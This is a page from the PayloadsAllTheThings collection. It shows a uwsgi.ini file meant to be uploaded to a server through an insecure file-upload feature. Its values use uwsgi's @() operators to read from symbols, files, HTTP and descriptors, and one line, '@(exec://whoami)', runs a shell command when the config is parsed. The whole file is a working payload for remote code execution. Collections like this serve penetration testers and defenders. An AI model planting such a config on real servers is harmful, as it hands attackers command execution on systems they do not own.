PayloadsAllTheThings/Upload Insecure Files/Configuration uwsgi.ini/uwsgi.ini
2023-03-01 14:49:31 +01:00

13 lines
352 B
INI

[uwsgi]
; read from a symbol
foo = @(sym://uwsgi_funny_function)
; read from binary appended data
bar = @(data://[REDACTED])
; read from http
test = @(http://[REDACTED])
; read from a file descriptor
content = @(fd://[REDACTED])
; read from a process stdout
body = @(exec://whoami)
; call a function returning a char *
characters = @(call://uwsgi_func)